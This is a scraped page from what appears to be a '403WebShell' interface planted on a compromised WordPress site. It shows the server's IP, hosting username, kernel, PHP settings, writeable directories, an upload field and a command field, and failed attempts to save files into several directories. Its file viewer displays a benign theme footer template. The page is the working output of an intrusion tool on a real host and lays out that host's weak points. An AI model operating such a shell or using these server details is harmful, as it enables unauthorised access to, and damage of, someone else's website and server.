Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.15.26.184
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/diixadigital.com/wp-content/themes/meto/templates/footer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/diixadigital.com/wp-content/themes/meto/templates/footer/footer_v4.php
<?php
/**
 * Footer Template  File
 *
 * @package METO
 * @author  Theme Kalia
 * @version 1.0
 */

$options = meto_WSH()->option();

$footer_logo_img    = $options->get('footer_logo_image');
$footer_logo_img    = meto_set($footer_logo_img, 'url', METO_URI . 'assets/images/logo.png');

$allowed_html = wp_kses_allowed_html('post');
?>

<footer id="site-footer" class="site-footer bg-gradient footer-top-bottom main-footer">

    <div class="footer-shape-top">

        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 100" preserveAspectRatio="none">
			<path class="footer-shape-fill" d="M500,97C126.7,96.3,0.8,19.8,0,0v100l1000,0V1C1000,19.4,873.3,97.8,500,97z"></path>
		</svg>

    </div>

    <div class="auto-container">
		<div class="footer-bg-animation">
            <div class="pattern-layer-one" style="background-image: url(<?php echo esc_url( get_template_directory_uri() ); ?>/assets/images/icons/pattern-1.png)"></div>
            <div class="patern-layer-two" style="background-image: url(<?php echo esc_url( get_template_directory_uri() ); ?>/assets/images/background/pattern-1.png)"></div>
            <div class="pattern-layer-three" style="background-image: url(<?php echo esc_url( get_template_directory_uri() ); ?>/assets/images/background/pattern-5.png)"></div>
        </div>

        <div class="footer-logo text-center">
			<div class="logo"><a href="<?php echo esc_url(home_url('/')); ?>"><img class="attachment-large size-large" src="<?php echo esc_url($footer_logo_img); ?>" alt="<?php esc_attr_e('Logo', 'meto'); ?>" title="<?php esc_attr_e('Logo', 'meto'); ?>"></a></div>
        </div>

        <div class="row clearfix">
			<?php if($options->get('footer_address_v4')): ?>
            <div class="col-lg-4 col-md-6 col-sm-12">
				<div class="ft-col-contact text-center">
                    <div class="contact-info box-style2 text-light">
                        <div class="box-icon"><i class="icon flaticon-maps-and-flags"></i></div>
                        <?php echo wp_kses($options->get('footer_address_v4'), $allowed_html);?> 
                    </div>
				</div>
			</div>
            <?php endif; ?>
            <?php if($options->get('footer_email_v4')): ?>
            <div class="col-lg-4 col-md-6 col-sm-12">
				<div class="ft-col-contact text-center">
                    <div class="contact-info box-style2 text-light">
                        <div class="box-icon"><i class="icon flaticon-email-4"></i></div>
                        <?php echo wp_kses($options->get('footer_email_v4'), $allowed_html);?> 
                    </div>
				</div>
			</div>
            <?php endif; ?>
            <?php if($options->get('footer_phone_v4')): ?>
            <div class="col-lg-4 col-md-6 col-sm-12">
				<div class="ft-col-contact text-center">
                    <div class="contact-info box-style2 text-light">
                        <div class="box-icon"><i class="icon flaticon-call"></i></div>
                        <?php echo wp_kses($options->get('footer_phone_v4'), $allowed_html);?> 
                    </div>
				</div>
			</div>
            <?php endif; ?>
        </div>

        <div class="footer-menu text-center">

            <ul id="menu-footer-menu" class="menu">
				<?php wp_nav_menu(array( 'theme_location' => 'footer_menu', 'container_id' => 'navbar-collapse-1',
					'container_class'=>'navbar-collapse collapse navbar-right',
					'menu_class'=>'nav navbar-nav',
					'fallback_cb'=>false,
					'items_wrap' => '%3$s',
					'container'=>false,
					'depth'=>'1',
					'walker'=> new Bootstrap_walker()
				)); ?>
            </ul>

        </div>
		<?php if($options->get('show_footer_social_icon_4')): ?>
        <ul class="social-box text-center">
			<?php echo wp_kses_post(meto_get_social_icons2()); ?>
		</ul>
		<?php endif;?>
    </div>
	
    <!-- Footer Bottom -->
    <div class="footer-bottom">
		<div class="copyright"><?php echo wp_kses($options->get('copyright_text4', '2023 &copy; All rights reserved by <a href="#">Expert Themes</a>'), $allowed_html); ?></div>
    </div>

</footer><!-- #site-footer -->

Youez - 2016 - github.com/yon3zu
LinuXploit